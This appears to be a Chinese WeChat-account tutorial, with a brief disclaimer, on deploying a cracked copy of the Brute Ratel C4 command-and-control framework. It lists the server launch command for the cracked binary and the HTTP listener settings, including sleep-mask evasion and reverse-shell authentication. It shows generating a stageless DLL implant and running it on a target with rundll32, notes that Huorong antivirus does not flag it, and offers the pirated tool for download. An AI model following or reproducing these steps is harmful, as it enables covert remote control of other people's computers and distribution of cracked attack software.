免责申明
本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
简介
第一次接触Brute Ratel C4 工具,以前只使用过cs、msf、viper等远控工具。Brute Ratel C4功能还是非常的强大,本篇文章只是简单的介绍如何使用,后续会参考官网教程和一些翻译版本的教程记录下工具成都使用过程。
官网版本:V2.0
使用版本:V1.4.5
官方链接:https://0xdarkvortex.dev/
使用
工具目录
工具使用
将工具上传到kali服务器上
可以生成属于自己的证书
进入adhoc_scripts目录下运行,生成证书
chmod +x install.sh
chmod +x genssl.sh
然后挨个执行
执行完后将生成的key.pem 和cert.pem复制到工具的目录下
执行服务端
可以允许./brute-ratel-linx64 -ratel
命令查看支持哪些参数,感兴趣的可以根据自己需求添加参数运行
./brute-ratel-linx64_crack -ratel -a xiaoc -p xiaoc@123 -h 127.0.0.1:50000 -sc cert.pem -sk key.pem
开启客户端后会弹出一个登录框,输入刚才启动服务端时候的主机端口、账号密码点击头像登录
./Rungui.sh
进入系统界面
###设置监听器
Brute Ratel C4 支持两种监听器 HTTP和DNS OVER HTTP
本次演示使用HTTP监听器
打开监听器设置,界面设置基本上跟CS差不多
Listener name:随意填写,监听器名称
Listener bind host:可以选择监听IP地址,默认是127.0.0.1
Rotational hosts:重定向地址,可以直接点击后面same
Port:监听的端口
Useragent:可以根据自己需求设置Useragent
URI(s):设置域名,可以随意设置,例如xiaoc.com
OS:目前仅支持windows
SSL:建议选择NO,目前YES没有上线成功
Proxy:代理
Sleep mask :休眠间隔期间的混淆策略,可以在三种技术之间进行选择:异步过程
调用 (APC)、线程池技术一或线程池技术二
Default sleep (sec):设置睡眠时间和抖动间隔。定义休眠时间和抖动间隔后,会选择休眠时间和抖动百分比之间的随机值并将其添加到休眠时间中以执行实际休眠
Common Auth:选择后,只要执行载荷就会反弹shell
one Time Auth:默认反弹一次,可以自定义,执行完规定次数后,载荷废弃,如被其他人拿到就无法再次执行
下图为本次测试的监听器配置,提供参考:
保存监听器成功
生成载荷
右键此监听器,选择Stageless,X64 Arch (Default) -> DLL
将文件上传到目标主机
rundll32.exe badger_x64.dll,main
上线成功!!!!!!!!
执行命令
查看进程
查看文件
火绒最新版没有报毒
后续继续更新详细教程
下载链接
关注公众号回复“20240702”下载远控工具Brute Ratel C4 1.4.5